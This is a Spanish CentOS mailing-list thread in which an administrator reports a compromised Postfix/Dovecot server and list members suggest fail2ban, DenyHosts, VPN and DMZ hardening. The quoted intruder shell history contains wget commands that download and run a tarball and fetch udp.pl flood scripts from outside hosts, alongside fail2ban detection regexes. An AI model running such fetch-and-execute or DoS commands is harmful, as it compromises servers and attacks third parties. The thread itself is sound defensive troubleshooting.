Re: [CentOS-es] Servidor Scaneado por un diccionario de datos en postfix+dovecot
Asi es estimado Tito, tambien estoy en eso , pero al final que mas proteccion le puedo dar ya con todo lo que me UDs me indicaron y ayudas de la WEB , si llego a levantar este servidor como se que no volvere a pasar lo mismo?.Ya estoy tomando medidas correctivas con creacion de usuarios, passwords y diferentes accesos. Podías considerar que ese servidor ya esta tomado podrías y seguirían haciéndolo mientras más seguridad le pongas más trabajo le daras pero seguirán con lo mismo creo q debes considerar darle de baja, y armar Otro servidor en paralelo con otra ip publica pero con otra protección y cerrando algunos puertos. El abr 5, 2013 10:12 a.m., Luis Alberto Roman Aguirre luisroma...@hotmail.com escribió: ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es
Re: [CentOS-es] Servidor Scaneado por un diccionario de datos en postfix+dovecot
Podías considerar que ese servidor ya esta tomado podrías y seguirían haciéndolo mientras más seguridad le pongas más trabajo le daras pero seguirán con lo mismo creo q debes considerar darle de baja, y armar Otro servidor en paralelo con otra ip publica pero con otra protección y cerrando algunos puertos. El abr 5, 2013 10:12 a.m., Luis Alberto Roman Aguirre luisroma...@hotmail.com escribió: Buenas amigos Listeros: Retomando el tema del servidor de correos, perdón por el retraso, y agradeciendo por la respuesta a:José María Terry Jiménez,Jesus Armando Uch Canu,Jose Fernández Rodríguez,Francesc Guitart ...a la LISTA en GENERAL ..y si me olvide de alguien mil disculpas. Bueno, es comento que los días posteriores fue tanto el escaneo que al final tomaron posesión de mi servidor a través de un usuario el cual borre pero nada tuve que formatear el servidor todo de cero de nuevo.Pero todo esto paso (CREO YO) , por un un usuario el cual descargo y ejecuto este archivo: wget www.csservers.ro/csservers_redirecte_linux_hlds.tar.gz tar -pxzf csservers_redirecte_linux_hlds.tar.gz ps x killall screen ps x free -m screen cd csservers_redirecte_linux_hlds ./start cd .. #wget http://y2khom3.evonet.ro/udp.pl #wget www.buble.biz/alinftp/udp.pl #wget www.packetstormsecurity.org/DoS/udp.pl #ps x #cd /tmp #ls -a #w Ahora les detallo que ingresaron por un usuario el cual hace reenvio de correos a nivel local el cual no tenia contraseña, en el nuevo servidor le puse contraseña a todos los usuarios y demas con caracteres(mayusculas,minusculas y numeros). Lo que me sorprende fue aun despues de reinstalar el centos , creo ya que me agarraron de punto , porque note que sigo siendo escaneado por la misma lista antes de la reinstalacion les copio parte y les adjunto en txt:dovecot: Authentication Failures:base: 1376 Time(s)root: 52 Time(s)postmaster rhost=190.210.136.21 : 32 Time(s)mlizana rhost=10.1.0.28 : 20 Time(s)aa rhost=113.162.161.245 : 18 Time(s)admin rhost=183.60.20.40 : 14 Time(s)mconde: 10 Time(s)test rhost=183.60.20.40 : 10 Time(s)admin1 rhost=183.60.20.40 : 8 Time(s)dedicated rhost=183.60.20.40 : 8 Time(s)html rhost=183.60.20.40 : 8 Time(s)user1 rhost=183.60.20.40 : 8 Time(s)bdsistemas: 6 Time(s) La ip segun lo investigado es de China: http://whatismyipaddress.com/ip/183.60.20.40 y salio esto:(ojo hay otro router que salio mientras escribía es este http://201.77.5.191/ de Brazil)General IP InformationIP:183.60.20.40Decimal:3074167848Hostname:183.60.20.40ISP:ChinaNet Guangdong Province NetworkOrganization:ChinaNet Guangdong Province NetworkServices:None detectedType:BroadbandAssignment:Static IPBlacklist:Geolocation InformationCountry:China State/Region:GuangdongCity:GuangzhouLatitude:23.1167 (23° 7′ 0.12″ N)Longitude:113.25 (113° 15′ 0.00″ E) Por recomendación de los ya mencionados amigos instale el fail2ban pero creo que no hace nada o bien algo estoy haciendo mal ,posteo configuracion:Jail.conf[dovecot-pop3imap]enabled = truefilter = dovecot-pop3imapaction = iptables-multiport[name=dovecot-pop3imap, port=pop3,pop3s,imap,imaps, protocol=tcp] sendmail-whois[name=dovecot-pop3imap, dest=root, sender=u...@xxx.xxx]logpath = /var/log/maillogmaxretry = 2#findtime = 600bantime = 5200 En la carpeta filter.d/dovecot-pop3imap.conf tengo esto:[Definition]failregex = dovecot: auth-worker\(default\): sql\(.*,HOST\): unknown userdovecot: (pop3|imap)-login: Aborted login \(.*\): .*, \[HOST\]dovecot: (pop3|imap)-login: Disconnected \(auth failed, .*\): .*, \[HOST\]dovecot: auth\(default\): passdb\(.*,HOST\)\: Attempted login with password having illegal charsdovecot: (pop3|imap)-login: Disconnected \(auth failed, .*\): .*, \[HOST\]dovecot: (pop3|imap)-login: Aborted login: .*, \[HOST\]ignoreregex = La cosa que los escaneos que me hacen al dovecot el fail2ban no tiene idea de ellos, algo estoy haciendo mal?, estoy por probar el OSSEC, pero si hay otra herramienta o bien algo mas que se pueda hacer, ya que ser victima de nuevo y lo peor que me baneen en la black list para una empresa que depende del correo es lo peor que les puede suceder, hablo por la experiencia amigos. Gracias por la ayuda , por leer este mail, y por soportarme amigos, desde ya muchas gracias por sus respuestas.PDT:prometo responder como me fue , asi ayudar a alguien mas que pueda tener este problema Atte. Luis Roman ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es
Re: [CentOS-es] Servidor Scaneado por un diccionario de datos en postfix+dovecot
Porque nos llegan los emails de todos a todos Saludos CELESTINO BARRIENTOS PEREZ Dpto. de Gestión de Cuentas t...@hostigal.com C/Rosalía de Castro 31, Entr. Dcha Milladoiro (Ames) Telf. 981 524 769 / Fax 981 935 338 www.hostigal.com www.softigal.com La presente comunicación se realiza por Hostisoft S.L.. Sus datos personales forman parte de los ficheros de Hostisoft S.L., en virtud de las relaciones autorizadas mutuas. El correo electrónico se envía personalizado de manera que nunca podrá ver la dirección de correo de otro usuario ni tampoco otro usuario podrá ver la suya. Caso de no estar interesado en el envío de más información de su interés, puede acceder, modificar, así como proceder a la cancelación de sus datos a través de correo a l...@hostisoft.com o mediante carta dirigida a Hostisoft S.L., Rosalía de Castro, 31 entreplanta derecha, Milladoiro, Ames (15895) A CORUÑA, acreditando su identidad. Antes de imprimir este e-mail piense bien si es necesario hacerlo. El medioambiente es cosa de todos. -Mensaje original- De: centos-es-boun...@centos.org [mailto:centos-es-boun...@centos.org] En nombre de tit...@gmail.com Enviado el: lunes, 15 de abril de 2013 13:29 Para: centos-es@centos.org Asunto: Re: [CentOS-es] Servidor Scaneado por un diccionario de datos en postfix+dovecot Podías considerar que ese servidor ya esta tomado podrías y seguirían haciéndolo mientras más seguridad le pongas más trabajo le daras pero seguirán con lo mismo creo q debes considerar darle de baja, y armar Otro servidor en paralelo con otra ip publica pero con otra protección y cerrando algunos puertos. El abr 5, 2013 10:12 a.m., Luis Alberto Roman Aguirre luisroma...@hotmail.com escribió: Buenas amigos Listeros: Retomando el tema del servidor de correos, perdón por el retraso, y agradeciendo por la respuesta a:José María Terry Jiménez,Jesus Armando Uch Canu,Jose Fernández Rodríguez,Francesc Guitart ...a la LISTA en GENERAL ..y si me olvide de alguien mil disculpas. Bueno, es comento que los días posteriores fue tanto el escaneo que al final tomaron posesión de mi servidor a través de un usuario el cual borre pero nada tuve que formatear el servidor todo de cero de nuevo.Pero todo esto paso (CREO YO) , por un un usuario el cual descargo y ejecuto este archivo: wget www.csservers.ro/csservers_redirecte_linux_hlds.tar.gz tar -pxzf csservers_redirecte_linux_hlds.tar.gz ps x killall screen ps x free -m screen cd csservers_redirecte_linux_hlds ./start cd .. #wget http://y2khom3.evonet.ro/udp.pl #wget www.buble.biz/alinftp/udp.pl #wget www.packetstormsecurity.org/DoS/udp.pl #ps x #cd /tmp #ls -a #w Ahora les detallo que ingresaron por un usuario el cual hace reenvio de correos a nivel local el cual no tenia contraseña, en el nuevo servidor le puse contraseña a todos los usuarios y demas con caracteres(mayusculas,minusculas y numeros). Lo que me sorprende fue aun despues de reinstalar el centos , creo ya que me agarraron de punto , porque note que sigo siendo escaneado por la misma lista antes de la reinstalacion les copio parte y les adjunto en txt:dovecot: Authentication Failures:base: 1376 Time(s)root: 52 Time(s)postmaster rhost=190.210.136.21 : 32 Time(s)mlizana rhost=10.1.0.28 : 20 Time(s)aa rhost=113.162.161.245 : 18 Time(s)admin rhost=183.60.20.40 : 14 Time(s)mconde: 10 Time(s)test rhost=183.60.20.40 : 10 Time(s)admin1 rhost=183.60.20.40 : 8 Time(s)dedicated rhost=183.60.20.40 : 8 Time(s)html rhost=183.60.20.40 : 8 Time(s)user1 rhost=183.60.20.40 : 8 Time(s)bdsistemas: 6 Time(s) La ip segun lo investigado es de China: http://whatismyipaddress.com/ip/183.60.20.40 y salio esto:(ojo hay otro router que salio mientras escribía es este http://201.77.5.191/ de Brazil)General IP InformationIP:183.60.20.40Decimal:3074167848Hostname:183.60.20.40ISP:ChinaNet Guangdong Province NetworkOrganization:ChinaNet Guangdong Province NetworkServices:None detectedType:BroadbandAssignment:Static IPBlacklist:Geolocation InformationCountry:China State/Region:GuangdongCity:GuangzhouLatitude:23.1167 (23° 7′ 0.12″ N)Longitude:113.25 (113° 15′ 0.00″ E) Por recomendación de los ya mencionados amigos instale el fail2ban pero creo que no hace nada o bien algo estoy haciendo mal ,posteo configuracion:Jail.conf[dovecot-pop3imap]enabled = truefilter = dovecot-pop3imapaction = iptables-multiport[name=dovecot-pop3imap, port=pop3,pop3s,imap,imaps, protocol=tcp] sendmail-whois[name=dovecot-pop3imap, dest=root, sender=u...@xxx.xxx]logpath = /var/log/maillogmaxretry = 2#findtime = 600bantime = 5200 En la carpeta filter.d/dovecot-pop3imap.conf tengo esto:[Definition]failregex = dovecot: auth-worker\(default\): sql\(.*,HOST\): unknown userdovecot: (pop3|imap)-login: Aborted login \(.*\): .*, \[HOST\]dovecot: (pop3|imap)-login: Disconnected \(auth failed
Re: [CentOS-es] Servidor Scaneado por un diccionario de datos en postfix+dovecot
El 15 de abril de 2013 13:26, t...@hostigal.com escribió: Porque nos llegan los emails de todos a todos Saludos CELESTINO BARRIENTOS PEREZ Dpto. de Gestión de Cuentas t...@hostigal.com C/Rosalía de Castro 31, Entr. Dcha Milladoiro (Ames) Telf. 981 524 769 / Fax 981 935 338 www.hostigal.com www.softigal.com Porque así funcionan las listas de correo como a la que te suscribiste -- Diego - Yo no soy paranoico! (pero que me siguen, me siguen) ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es
Re: [CentOS-es] Servidor Scaneado por un diccionario de datos en postfix+dovecot
Sigo sin ver correctamente tu correo. Utiliza maillog para leer donde esté el log del usuario invalido o atacante. Has verificado que el filtro (/etc/fail2ban/filter.d) de fail2ban matchee contra lo que tenés en el log? Si cambia el formato, no va a coincidir y no hará nada. La config de fail2ban en pastebin, no puede verse, al parecer, no existe ( http://pastebin.com/Qna3gdgP ) El día 12 de abril de 2013 11:31, Luis Alberto Roman Aguirre luisroma...@hotmail.com escribió: Buenas listeros:Mi estimado Diego revise lo que me pasastes y aun nada, pero me queda la duda cuando haces la prueba con /var/log/secure eso es para todos los servicios?, porque por ejemplo para el dovecot lo hago con el /var/log/maillog, pero aun asi probe con los dos y aun nada. Y les comento que aun sigo siendo escaneado o bien ya no se que pasa. lo Hize en el pastebin... aqui esta: http://pastebin.com/v4T0rGLX esto paso ayer Jueves.Ahora el fail2ban ni lo detecto ,la configuracion del jail.conf lo pegare en pastebin: http://pastebin.com/Qna3gdgP , la parte de dovecot buscando en internet encontre una configuracion de dovecto-pop3imap, pero aun asi nada.La configuracion de filter.d/dovecot-pop3imap.conf es: http://pastebin.com/XsGErnMr. espero puedan verlos , ya que si pego por aqui el codigo sale deformado.esto sale en el testeo espero se pueda ver:[root@mail ~]# fail2ban-client statusStatus|- Number of jail: 6`- Jail list: proftpd-iptables, dovecot-pop3imap, ssh-iptables, postfix-tcpwrapper, vsftpd-notification, vsftpd-iptables[root@mail ~]# fail2ban-regex /var/log/maillog /etc/fail2ban/filter.d/dovecot-pop3imap.confRunning testsUse regex file : /etc/fail2ban/filter.d/dovecot-pop3imap.confUse log file : /var/log/maillogResultsFailregex: 0 totalIgnoreregex: 0 totalSummarySorry, no matchLook at the above section 'Running tests' which could contain importantinformation.Gracias por su tiempo estimados. Atte Luis Roman[CentOS-es] Servidor Scaneado por un diccionario de datosen postfix+dovecot To: centos-es@centos.org Message-ID: CAJ8aDpBPCXD7QPwyZzYqn8CQGt=xeeqzsf4vjkpj3o6y7hp...@mail.gmail.com Content-Type: text/plain; charset=UTF-8 Hola Luis Podrías poner la config de fail2ban en algun servicio que respete los saltos de linea? (pastebin, por ejemplo) Asegurate de eliminar todos los datos de tu server antes... Comprobaste que este matcheando la regla contra el log? Lo haces asi, obviamente, reemplazando donde haga falta Mi prueba la hice contra sshd root@proxy ~/ # fail2ban-client status Status |- Number of jail: 2 `- Jail list: apache-badUsersAuth, ssh root@proxy ~/ # fail2ban-client status ssh Status for the jail: ssh |- filter | |- File list: /var/log/secure | |- Currently failed: 0 | `- Total failed: 84 `- action |- Currently banned: 5 | `- IP list: 200.192.153.132 115.95.166.247 119.134.244.22 166.111.230.4 122.226.160.19 `- Total banned: 5 root@proxy ~/ # fail2ban-regex /var/log/secure /etc/fail2ban/filter.d/sshd.conf Running tests = Use regex file : /etc/fail2ban/filter.d/sshd.conf Use log file : /var/log/secure [[ mucho mucho texto e ips ]] Date template hits: 92938 hit(s): MONTH Day Hour:Minute:Second Success, the total number of match is 3181 However, look at the above section 'Running tests' which could contain important information. root@proxy ~/ # ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es -- Diego - Yo no soy paranoico! (pero que me siguen, me siguen) ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es
Re: [CentOS-es] Servidor Scaneado por un diccionario de datos en postfix+dovecot (Jose Sabastizagal)
Hola Jose, gracias por la respuesta , lo he probado con ssh que funciona muy bien, pero tambien busque documentacion para el dovecot u otros servicios , pero no lo encuentro sera que no lo soporta??Saludos Luis Roman #Ademas de Fail2ban otra herramienta bastante útil que se complementa es #Denyhosts, para que bloquee las ip al 3er intento de conexión #http://denyhosts.sourceforge.net/ #https://www.digitalocean.com/community/articles/how-to-install-denyhosts-on-centos-6 ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es
Re: [CentOS-es] Servidor Scaneado por un diccionario de datos en postfix+dovecot
Buenas amigos listeros: Pues si estimado creo que que fui parte de esta red de servidores Counter Stryke, te comento que el ssh , lo tengo configurado ya por necesidad ya que el trabajo movil que llevo me fuerza a hacerlo.Pero te dire que lo tengo configurado en otro puerto y ademas solo para que mi usuario pueda conectarse, ademas de no permitir que el root pueda loguearse al principio, aparte edite el archivo /etc/passwd y a los usuarios en vez de tener BASH les puse a FALSE, esta bien esto? o me recomiendas otra cosa?Ya monte una VPn ,pero el drama en conectarme y tener las mismas caracteristicas del ssh, me sigo documentando en eso, aunque con poca fortuna, espero me puedas dar una manito.Gracias por todo.Luis Roman#Estimado una consulta, cuando dices que tomaron posesión de tu servidor,#finalmente se conectaron por ssh con el usuario que mencionas?? veo que #sacaste el historial de la consola bash del usuario en cuestión, es así? #Si tienes el servicio SSH escuchando al mundo, es muy probable que tengas #que lidiar con este tipo de situaciones, quizás debas considerar #implementar una VPN para administrar tu(s) server(s) desde Internet, #investiga sobre OpenVPN que es una buena solución y además debes cerrar el #ervicio SSH a Internet. #Puedes también separar (si las lucas lo permiten) el servicio SMTP del POP #o IMAP que tengas y utilizar usuarios virtuales y autenticarlos contra un #OpenLDAP, además deberías considerar implementar una arquitectura DMZ donde #puedes separar tu FW, Servidores y LAN en zonas distintas, obviamente sólo #si las lucas te lo permiten. #Por lo que vi de las descargas parece estuviste a punto de ser parte una #red de servidores Counter Strike (csservers_redirecte_linux_hlds.tar.gz) y #quizás parte de una red zombie de ataques de negación de servicios (udp.pl). #Saludos! ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es
[CentOS-es] Servidor Scaneado por un diccionario de datos en postfix+dovecot
Buenas listeros:Mi estimado Diego revise lo que me pasastes y aun nada, pero me queda la duda cuando haces la prueba con /var/log/secure eso es para todos los servicios?, porque por ejemplo para el dovecot lo hago con el /var/log/maillog, pero aun asi probe con los dos y aun nada. Y les comento que aun sigo siendo escaneado o bien ya no se que pasa. lo Hize en el pastebin... aqui esta: http://pastebin.com/v4T0rGLX esto paso ayer Jueves.Ahora el fail2ban ni lo detecto ,la configuracion del jail.conf lo pegare en pastebin: http://pastebin.com/Qna3gdgP , la parte de dovecot buscando en internet encontre una configuracion de dovecto-pop3imap, pero aun asi nada.La configuracion de filter.d/dovecot-pop3imap.conf es: http://pastebin.com/XsGErnMr. espero puedan verlos , ya que si pego por aqui el codigo sale deformado.esto sale en el testeo espero se pueda ver:[root@mail ~]# fail2ban-client statusStatus|- Number of jail: 6`- Jail list: proftpd-iptables, dovecot-pop3imap, ssh-iptables, postfix-tcpwrapper, vsftpd-notification, vsftpd-iptables[root@mail ~]# fail2ban-regex /var/log/maillog /etc/fail2ban/filter.d/dovecot-pop3imap.confRunning testsUse regex file : /etc/fail2ban/filter.d/dovecot-pop3imap.confUse log file : /var/log/maillogResultsFailregex: 0 totalIgnoreregex: 0 totalSummarySorry, no matchLook at the above section 'Running tests' which could contain importantinformation.Gracias por su tiempo estimados. Atte Luis Roman[CentOS-es] Servidor Scaneado por un diccionario de datosen postfix+dovecot To: centos-es@centos.org Message-ID: CAJ8aDpBPCXD7QPwyZzYqn8CQGt=xeeqzsf4vjkpj3o6y7hp...@mail.gmail.com Content-Type: text/plain; charset=UTF-8 Hola Luis Podrías poner la config de fail2ban en algun servicio que respete los saltos de linea? (pastebin, por ejemplo) Asegurate de eliminar todos los datos de tu server antes... Comprobaste que este matcheando la regla contra el log? Lo haces asi, obviamente, reemplazando donde haga falta Mi prueba la hice contra sshd root@proxy ~/ # fail2ban-client status Status |- Number of jail: 2 `- Jail list: apache-badUsersAuth, ssh root@proxy ~/ # fail2ban-client status ssh Status for the jail: ssh |- filter | |- File list: /var/log/secure | |- Currently failed: 0 | `- Total failed: 84 `- action |- Currently banned: 5 | `- IP list: 200.192.153.132 115.95.166.247 119.134.244.22 166.111.230.4 122.226.160.19 `- Total banned: 5 root@proxy ~/ # fail2ban-regex /var/log/secure /etc/fail2ban/filter.d/sshd.conf Running tests = Use regex file : /etc/fail2ban/filter.d/sshd.conf Use log file : /var/log/secure [[ mucho mucho texto e ips ]] Date template hits: 92938 hit(s): MONTH Day Hour:Minute:Second Success, the total number of match is 3181 However, look at the above section 'Running tests' which could contain important information. root@proxy ~/ # ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es
Re: [CentOS-es] Servidor Scaneado por un diccionario de datos en postfix+dovecot
Por favor dejen de enviarme estos correos tan raros, gracias. Luis Alberto Roman Aguirre luisroma...@hotmail.com escribió: Buenas listeros:Mi estimado Diego revise lo que me pasastes y aun nada, pero me queda la duda cuando haces la prueba con /var/log/secure eso es para todos los servicios?, porque por ejemplo para el dovecot lo hago con el /var/log/maillog, pero aun asi probe con los dos y aun nada. Y les comento que aun sigo siendo escaneado o bien ya no se que pasa. lo Hize en el pastebin... aqui esta: http://pastebin.com/v4T0rGLX esto paso ayer Jueves.Ahora el fail2ban ni lo detecto ,la configuracion del jail.conf lo pegare en pastebin: http://pastebin.com/Qna3gdgP , la parte de dovecot buscando en internet encontre una configuracion de dovecto-pop3imap, pero aun asi nada.La configuracion de filter.d/dovecot-pop3imap.conf es: http://pastebin.com/XsGErnMr. espero puedan verlos , ya que si pego por aqui el codigo sale deformado.esto sale en el testeo espero se pueda ver:[root@mail ~]# fail2ban-client statusStatus|- Number of jail: 6`- Jail list: proftpd-iptables, dovecot-pop3imap, ssh-iptables, postfix-tcpwrapper, vsftpd-notification, vsftpd-iptables[root@mail ~]# fail2ban-regex /var/log/maillog /etc/fail2ban/filter.d/dovecot-pop3imap.confRunning testsUse regex file : /etc/fail2ban/filter.d/dovecot-pop3imap.confUse log file : /var/log/maillogResultsFailregex: 0 totalIgnoreregex: 0 totalSummarySorry, no matchLook at the above section 'Running tests' which could contain importantinformation.Gracias por su tiempo estimados. Atte Luis Roman[CentOS-es] Servidor Scaneado por un diccionario de datosen postfix+dovecot To: centos-es@centos.org Message-ID: CAJ8aDpBPCXD7QPwyZzYqn8CQGt=xeeqzsf4vjkpj3o6y7hp...@mail.gmail.com Content-Type: text/plain; charset=UTF-8 Hola Luis Podrías poner la config de fail2ban en algun servicio que respete los saltos de linea? (pastebin, por ejemplo) Asegurate de eliminar todos los datos de tu server antes... Comprobaste que este matcheando la regla contra el log? Lo haces asi, obviamente, reemplazando donde haga falta Mi prueba la hice contra sshd root@proxy ~/ # fail2ban-client status Status |- Number of jail: 2 `- Jail list: apache-badUsersAuth, ssh root@proxy ~/ # fail2ban-client status ssh Status for the jail: ssh |- filter | |- File list: /var/log/secure | |- Currently failed: 0 | `- Total failed: 84 `- action |- Currently banned: 5 | `- IP list: 200.192.153.132 115.95.166.247 119.134.244.22 166.111.230.4 122.226.160.19 `- Total banned: 5 root@proxy ~/ # fail2ban-regex /var/log/secure /etc/fail2ban/filter.d/sshd.conf Running tests = Use regex file : /etc/fail2ban/filter.d/sshd.conf Use log file : /var/log/secure [[ mucho mucho texto e ips ]] Date template hits: 92938 hit(s): MONTH Day Hour:Minute:Second Success, the total number of match is 3181 However, look at the above section 'Running tests' which could contain important information. root@proxy ~/ # ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es
Re: [CentOS-es] Servidor Scaneado por un diccionario de datos en postfix+dovecot
Ademas de Fail2ban otra herramienta bastante útil que se complementa es Denyhosts, para que bloquee las ip al 3er intento de conexión http://denyhosts.sourceforge.net/ https://www.digitalocean.com/community/articles/how-to-install-denyhosts-on-centos-6 -- José A. Sabastizagal Orellana http://www.42.com.pe http://linux-ica.blogspot.com/ http://informaticoderecho.blogspot.com/ Linux Registered User # 469777 ___ CentOS-es mailing list CentOS-es@centos.org http://lists.centos.org/mailman/listinfo/centos-es
Re: [CentOS-es] Servidor Scaneado por un diccionario de datos en postfix+dovecot
Estimado una consulta, cuando dices que tomaron posesión de tu servidor, finalmente se conectaron por ssh con el usuario que mencionas?? veo que sacaste el historial de la consola bash del usuario en cuestión, es así? Si tienes el servicio SSH escuchando al mundo, es muy probable que tengas que lidiar con este tipo de situaciones, quizás debas considerar implementar una VPN para administrar tu(s) server(s) desde Internet, investiga sobre OpenVPN que es una buena solución y además debes cerrar el servicio SSH a Internet. Puedes también separar (si las lucas lo permiten) el servicio SMTP del POP o IMAP que tengas y utilizar usuarios virtuales y autenticarlos contra un OpenLDAP, además deberías considerar implementar una arquitectura DMZ donde puedes separar tu FW, Servidores y LAN en zonas distintas, obviamente sólo si las lucas te lo permiten. Por lo que vi de las descargas parece estuviste a punto de ser parte una red de servidores Counter Strike (csservers_redirecte_linux_hlds.tar.gz) y quizás parte de una red zombie de ataques de negación de servicios (udp.pl). Saludos! El 5 de abril de 2013 12:12, Luis Alberto Roman Aguirre luisroma...@hotmail.com escribió: Buenas amigos Listeros: Retomando el tema del servidor de correos, perdón por el retraso, y agradeciendo por la respuesta a:José María Terry Jiménez,Jesus Armando Uch Canu,Jose Fernández Rodríguez,Francesc Guitart ...a la LISTA en GENERAL ..y si me olvide de alguien mil disculpas. Bueno, es comento que los días posteriores fue tanto el escaneo que al final tomaron posesión de mi servidor a través de un usuario el cual borre pero nada tuve que formatear el servidor todo de cero de nuevo.Pero todo esto paso (CREO YO) , por un un usuario el cual descargo y ejecuto este archivo: wget www.csservers.ro/csservers_redirecte_linux_hlds.tar.gz tar -pxzf csservers_redirecte_linux_hlds.tar.gz ps x killall screen ps x free -m screen cd csservers_redirecte_linux_hlds ./start cd .. #wget http://y2khom3.evonet.ro/udp.pl #wget www.buble.biz/alinftp/udp.pl #wget www.packetstormsecurity.org/DoS/udp.pl #ps x #cd /tmp #ls -a #w Ahora les detallo que ingresaron por un usuario el cual hace reenvio de correos a nivel local el cual no tenia contraseña, en el nuevo servidor le puse contraseña a todos los usuarios y demas con caracteres(mayusculas,minusculas y numeros). Lo que me sorprende fue aun despues de reinstalar el centos , creo ya que me agarraron de punto , porque note que sigo siendo escaneado por la misma lista antes de la reinstalacion les copio parte y les adjunto en txt:dovecot: Authentication Failures:base: 1376 Time(s)root: 52 Time(s)postmaster rhost=190.210.136.21 : 32 Time(s)mlizana rhost=10.1.0.28 : 20 Time(s)aa rhost=113.162.161.245 : 18 Time(s)admin rhost=183.60.20.40 : 14 Time(s)mconde: 10 Time(s)test rhost=183.60.20.40 : 10 Time(s)admin1 rhost=183.60.20.40 : 8 Time(s)dedicated rhost=183.60.20.40 : 8 Time(s)html rhost=183.60.20.40 : 8 Time(s)user1 rhost=183.60.20.40 : 8 Time(s)bdsistemas: 6 Time(s) La ip segun lo investigado es de China: http://whatismyipaddress.com/ip/183.60.20.40 y salio esto:(ojo hay otro router que salio mientras escribía es este http://201.77.5.191/ de Brazil)General IP InformationIP:183.60.20.40Decimal:3074167848Hostname:183.60.20.40ISP:ChinaNet Guangdong Province NetworkOrganization:ChinaNet Guangdong Province NetworkServices:None detectedType:BroadbandAssignment:Static IPBlacklist:Geolocation InformationCountry:China State/Region:GuangdongCity:GuangzhouLatitude:23.1167 (23° 7′ 0.12″ N)Longitude:113.25 (113° 15′ 0.00″ E) Por recomendación de los ya mencionados amigos instale el fail2ban pero creo que no hace nada o bien algo estoy haciendo mal ,posteo configuracion:Jail.conf[dovecot-pop3imap]enabled = truefilter = dovecot-pop3imapaction = iptables-multiport[name=dovecot-pop3imap, port=pop3,pop3s,imap,imaps, protocol=tcp] sendmail-whois[name=dovecot-pop3imap, dest=root, sender=u...@xxx.xxx]logpath = /var/log/maillogmaxretry = 2#findtime = 600bantime = 5200 En la carpeta filter.d/dovecot-pop3imap.conf tengo esto:[Definition]failregex = dovecot: auth-worker\(default\): sql\(.*,HOST\): unknown userdovecot: (pop3|imap)-login: Aborted login \(.*\): .*, \[HOST\]dovecot: (pop3|imap)-login: Disconnected \(auth failed, .*\): .*, \[HOST\]dovecot: auth\(default\): passdb\(.*,HOST\)\: Attempted login with password having illegal charsdovecot: (pop3|imap)-login: Disconnected \(auth failed, .*\): .*, \[HOST\]dovecot: (pop3|imap)-login: Aborted login: .*, \[HOST\]ignoreregex = La cosa que los escaneos que me hacen al dovecot el fail2ban no tiene idea de ellos, algo estoy haciendo mal?, estoy por probar el OSSEC, pero si hay otra herramienta o bien algo mas que se pueda hacer, ya que ser victima de nuevo y lo peor
Re: [CentOS-es] Servidor Scaneado por un diccionario de datos en postfix+dovecot
Hola Luis Podrías poner la config de fail2ban en algun servicio que respete los saltos de linea? (pastebin, por ejemplo) Asegurate de eliminar todos los datos de tu server antes... Comprobaste que este matcheando la regla contra el log? Lo haces asi, obviamente, reemplazando donde haga falta Mi prueba la hice contra sshd root@proxy ~/ # fail2ban-client status Status |- Number of jail: 2 `- Jail list: apache-badUsersAuth, ssh root@proxy ~/ # fail2ban-client status ssh Status for the jail: ssh |- filter | |- File list:/var/log/secure | |- Currently failed: 0 | `- Total failed: 84 `- action |- Currently banned: 5 | `- IP list: 200.192.153.132 115.95.166.247 119.134.244.22 166.111.230.4 122.226.160.19 `- Total banned: 5 root@proxy ~/ # fail2ban-regex /var/log/secure /etc/fail2ban/filter.d/sshd.conf Running tests = Use regex file : /etc/fail2ban/filter.d/sshd.conf Use log file : /var/log/secure [[ mucho mucho texto e ips ]] Date template hits: 92938 hit(s): MONTH Day Hour:Minute:Second Success, the total number of match is 3181 However, look at the above section 'Running tests' which could contain important information. root@proxy ~/ # El día 5 de abril de 2013 12:12, Luis Alberto Roman Aguirre luisroma...@hotmail.com escribió: Buenas amigos Listeros: Retomando el tema del servidor de correos, perdón por el retraso, y agradeciendo por la respuesta a:José María Terry Jiménez,Jesus Armando Uch Canu,Jose Fernández Rodríguez,Francesc Guitart ...a la LISTA en GENERAL ..y si me olvide de alguien mil disculpas. Bueno, es comento que los días posteriores fue tanto el escaneo que al final tomaron posesión de mi servidor a través de un usuario el cual borre pero nada tuve que formatear el servidor todo de cero de nuevo.Pero todo esto paso (CREO YO) , por un un usuario el cual descargo y ejecuto este archivo: wget www.csservers.ro/csservers_redirecte_linux_hlds.tar.gz tar -pxzf csservers_redirecte_linux_hlds.tar.gz ps x killall screen ps x free -m screen cd csservers_redirecte_linux_hlds ./start cd .. #wget http://y2khom3.evonet.ro/udp.pl #wget www.buble.biz/alinftp/udp.pl #wget www.packetstormsecurity.org/DoS/udp.pl #ps x #cd /tmp #ls -a #w Ahora les detallo que ingresaron por un usuario el cual hace reenvio de correos a nivel local el cual no tenia contraseña, en el nuevo servidor le puse contraseña a todos los usuarios y demas con caracteres(mayusculas,minusculas y numeros). Lo que me sorprende fue aun despues de reinstalar el centos , creo ya que me agarraron de punto , porque note que sigo siendo escaneado por la misma lista antes de la reinstalacion les copio parte y les adjunto en txt:dovecot: Authentication Failures:base: 1376 Time(s)root: 52 Time(s)postmaster rhost=190.210.136.21 : 32 Time(s)mlizana rhost=10.1.0.28 : 20 Time(s)aa rhost=113.162.161.245 : 18 Time(s)admin rhost=183.60.20.40 : 14 Time(s)mconde: 10 Time(s)test rhost=183.60.20.40 : 10 Time(s)admin1 rhost=183.60.20.40 : 8 Time(s)dedicated rhost=183.60.20.40 : 8 Time(s)html rhost=183.60.20.40 : 8 Time(s)user1 rhost=183.60.20.40 : 8 Time(s)bdsistemas: 6 Time(s) La ip segun lo investigado es de China: http://whatismyipaddress.com/ip/183.60.20.40 y salio esto:(ojo hay otro router que salio 